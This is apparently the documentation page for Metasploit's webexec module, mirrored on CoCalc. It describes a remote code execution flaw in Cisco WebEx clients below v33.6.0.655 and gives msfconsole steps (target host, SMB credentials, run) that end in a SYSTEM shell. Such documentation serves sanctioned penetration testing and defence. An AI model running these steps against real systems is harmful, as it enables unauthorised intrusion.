CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/documentation/modules/exploit/windows/smb/webexec.md
Views: 1904
Description
This module exploits a remote code execution vulnerability in Cisco's WebEx client software for versions < v33.6.0.655.
Vulnerable WebEx clients come with the WebExService
that can execute arbitrary commands with System privileges. Due to insufficient checks on permissions, a local or domain user can start the WebExService
through a remote connection and execute code.
Vulnerable Application
Cisco WebEx software v33.3.8.7 and below
Verification Steps
Install the application
Start msfconsole
Do:
use exploit/windows/smb/webexec
Do:
set RHOSTS <IP>
Do:
set SMBUser <USERNAME>
Do:
set SMBPass <PASSWORD>
Do:
run
You should get a shell.